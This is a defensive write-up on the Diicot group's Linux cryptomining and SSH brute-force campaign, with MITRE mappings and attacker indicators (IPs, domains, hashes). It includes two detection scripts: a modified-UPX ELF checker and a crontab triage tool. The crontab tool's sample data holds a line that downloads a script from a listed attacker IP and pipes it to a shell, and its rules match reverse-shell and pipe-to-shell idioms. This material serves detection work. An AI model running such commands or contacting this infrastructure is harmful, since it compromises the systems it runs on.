Unpacking the Diicot Malware Targeting Linux Environments

Researchers attribute a new Linux-targeting campaign to the Romanian-speaking Diicot group. The campaign uses modified UPX packing, cloud-aware payloads, SSH brute-forcing, reverse shells, and crontab persistence to spread across cloud and non-cloud hosts. It includes cryptomining components (custom XMRig and the Zephyr protocol), HTTP-based C2 infrastructure with multiple payload servers, and has generated measurable Monero revenue. #Diicot #XMRig

Keypoints

  • The campaign is attributed to the Romanian-speaking Diicot (aka Mexals) and targets Linux systems, especially those running OpenSSH with weak credentials.
  • Attackers use a modified UPX packer (changed header and corrupted checksums) to evade standard unpacking and scanning tools.
  • Payloads are cloud-aware: cloud hosts trigger spreading behavior while non-cloud hosts are more likely to receive cryptomining payloads.
  • Main components include an Update (brute-spreader) binary, a reverse shell (cache), and a scanner (.bisis) for finding OpenSSH hosts.
  • Persistence is achieved by modifying crontab entries and scheduling recurring tasks; C2 communication occurs over HTTP with dedicated servers and domains.
  • Cryptomining (custom XMRig and Zephyr protocol) is present in the campaign; tracked Monero mining earnings exceed ~$16,000 from observed wallets.

MITRE Techniques

  • [T1027.002] Obfuscated Files or Information – Modified UPX header and corrupted checksum to prevent standard unpacking (‘changes the magic header from UPX! to YTSx99 and corrupts checksums’).
  • [T1053.003] Scheduled Task/Job: Cron – Maintains persistence by modifying crontab to schedule recurring tasks (‘modifying the crontab to schedule recurring tasks’).
  • [T1071.001] Application Layer Protocol: Web Protocols – Uses HTTP-based C2 to communicate with attacker servers and send reports (‘The malware communicates with a C2 server … using Go’s default HTTP implementation’).
  • [T1041] Exfiltration Over C2 Channel – Sends error and success reports (including brute-force results and system info) to the C2 server (‘sending two types of reports: error reports and information about successful brute-force attempts’).
  • [T1110.001] Brute Force: Password Guessing – Scans for OpenSSH and brute-forces weak credentials using a username/password list and the .bisis scanner (‘scans port 22 … looks specifically for responses indicating the presence of OpenSSH’ and then tries credential combinations).
  • [T1496.001] Resource Hijacking: Cryptomining – Deploys cryptominer payloads (custom XMRig and Zephyr) on non-cloud hosts to mine Monero/Zephyr-supported coins (‘contains a cryptominer (a custom version of XMRig) … references to mining pools and Zephyr protocol’).
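A defensive way to act on the T1027.002 entry above is to check suspicious ELF files for the packer marker. Stock UPX stamps the string `UPX!` into the packed file; the writeup says the Diicot packer rewrites that to `YTSx99`, so a scanner that looks for either marker (and falls back to a byte-entropy check for packers it does not recognize) can flag samples that `upx -d` would reject. The script below is an added example, not code from the writeup or from Wiz; the sample "ELF" it builds is constructed in memory and is not a real packed binary, and treating `YTSx99` as the literal six-byte string is an assumption taken from how the page spells it.

```python
import math
from collections import Counter

ELF_MAGIC = b"\x7fELF"
STOCK_UPX_MAGIC = b"UPX!"
# Marker reported for the Diicot-modified packer. Taken from the writeup as the
# literal string "YTSx99"; the exact on-disk byte form is an assumption here.
MODIFIED_UPX_MAGIC = b"YTSx99"


def shannon_entropy(data: bytes) -> float:
    """Bits per byte over the whole buffer; compressed/encrypted payloads sit near 8."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def inspect_elf(data: bytes) -> dict:
    """Classify a file as unpacked, stock UPX, modified UPX, or unknown high-entropy packer."""
    result = {
        "is_elf": data[:4] == ELF_MAGIC,
        "stock_upx_marker": data.count(STOCK_UPX_MAGIC),
        "modified_upx_marker": data.count(MODIFIED_UPX_MAGIC),
        "entropy": round(shannon_entropy(data), 2),
        "verdict": "unpacked",
    }
    # Marker hits take precedence over the entropy heuristic: they are specific evidence.
    if result["modified_upx_marker"]:
        result["verdict"] = "modified-upx"
    elif result["stock_upx_marker"]:
        result["verdict"] = "stock-upx"
    elif result["entropy"] > 7.0:
        result["verdict"] = "high-entropy-unknown-packer"
    return result


def build_sample(marker: bytes) -> bytes:
    """Constructed stand-in for a packed ELF (not a real binary): a 16-byte e_ident,
    a zero-filled loader stub, the packer marker where UPX's l_info block would sit,
    then 1024 bytes of evenly distributed 'compressed' data (entropy exactly 8.0)."""
    ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8
    stub = b"\x00" * 112
    compressed = bytes(range(256)) * 4
    return ident + stub + marker + compressed


if __name__ == "__main__":
    for label, sample in (
        ("diicot-style", build_sample(MODIFIED_UPX_MAGIC)),
        ("stock-upx", build_sample(STOCK_UPX_MAGIC)),
        ("marker-stripped", build_sample(b"")),
        ("plain", ELF_MAGIC + b"\x00" * 200),
    ):
        print(f"{label:16} {inspect_elf(sample)}")
```

In practice you would feed `inspect_elf()` the bytes of each file found in the writable locations the campaign uses (`/tmp`, `/var/tmp`, home directories) and treat any `modified-upx` verdict as a strong hit; the entropy fallback only says "probably packed by something", so it is a triage signal, not an attribution.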

Indicators of Compromise

  • [File names] Primary payloads and artifacts – Update, cache, .bisis, abc123 (used as cryptomining/payload components).
  • [File hashes] Sample file hashes from analyzed payloads – a2101ec53fb0934b23f83c582d3a0bed9f66fd13 (Update), 2ec6af460feabfe9ed37c1955ff266cff63f31ff (cache), and 3 more hashes.
  • [IP addresses] Attacker infrastructure and C2 – 80.76.51[.]5 (main payload server), 87.120.116[.]35 (C2 / mining pool), and other addresses such as 87.120.114[.]219 and 91.92.250[.]6.
  • [Domains] Domains used for payload hosting and C2 – digital.digitaldatainsights[.]org (payload server), test.digitaldatainsights[.]org (C2/mining), pauza.digitaldatainsights[.]org (reverse-shell C2).
  • [Mining pool URLs] Mining endpoints observed in configs – pool.supportxmr[.]com:443 and 87.120.116.35:7777 (Zephyr/Monero pools and configured users).
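The T1053.003 persistence entry and the file-name and infrastructure indicators above combine naturally into a crontab triage check: parse each scheduled entry and flag commands that reference the campaign's artifact names, contact its listed hosts, or use the download-and-pipe-to-shell and `/dev/tcp` idioms that go with the reverse shell. The script below is an added example, not code from the writeup or from Wiz. The indicator lists are copied from the IoC section (with the `[.]` defanging removed so they match real command text); the crontab it scans is a constructed sample, not a capture from a compromised host.

```python
import re

# Artifact names and infrastructure from the writeup's IoC section (undefanged).
KNOWN_ARTIFACTS = ("Update", "cache", ".bisis", "abc123")
KNOWN_HOSTS = (
    "80.76.51.5", "87.120.116.35", "87.120.114.219", "91.92.250.6",
    "digital.digitaldatainsights.org", "test.digitaldatainsights.org",
    "pauza.digitaldatainsights.org",
)

# Either an @-shortcut (@reboot, @daily, ...) or five schedule fields, then the command.
CRON_LINE = re.compile(r"^(@\w+|(?:\S+\s+){5})(.*)$")


def parse_crontab(text: str):
    """Yield (schedule, command) for each non-comment, non-assignment crontab line."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or environment assignment such as PATH=...
        m = CRON_LINE.match(line)
        if m:
            yield m.group(1).strip(), m.group(2).strip()


def triage_crontab(text: str) -> list[dict]:
    """Return one finding per crontab entry that matches a campaign indicator or idiom."""
    findings = []
    for schedule, command in parse_crontab(text):
        reasons = []
        for name in KNOWN_ARTIFACTS:
            # Match the name as a whole path component so 'cache' does not hit /var/cache/apt.
            if re.search(r"(^|[/\s])" + re.escape(name) + r"(\s|$)", command):
                reasons.append(f"references known artifact {name!r}")
        for host in KNOWN_HOSTS:
            if host in command:
                reasons.append(f"contacts known infrastructure {host}")
        if re.search(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", command):
            reasons.append("downloads and pipes to shell")
        if "/dev/tcp/" in command:
            reasons.append("bash /dev/tcp reverse-shell idiom")
        if reasons:
            findings.append({"schedule": schedule, "command": command, "reasons": reasons})
    return findings


# Constructed crontab for demonstration; not taken from a real host.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
PATH=/usr/local/bin:/usr/bin:/bin
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /tmp/.bisis >/dev/null 2>&1
@reboot /var/tmp/Update
30 * * * * curl -s http://87.120.116.35/x.sh | sh
0 0 * * 0 /usr/sbin/logrotate /etc/logrotate.conf
"""

if __name__ == "__main__":
    for f in triage_crontab(SAMPLE_CRONTAB):
        print(f"[{f['schedule']}] {f['command']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

Run it over `crontab -l` output for every user plus the files under `/etc/cron.d` and `/var/spool/cron`; an `@reboot` entry pointing at a bare binary in `/tmp` or `/var/tmp` is worth a look even when the name is not on the list, since the artifact names are trivially changed while the persistence mechanism is not.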

Read more: https://www.wiz.io/blog/diicot-threat-group-malware-campaign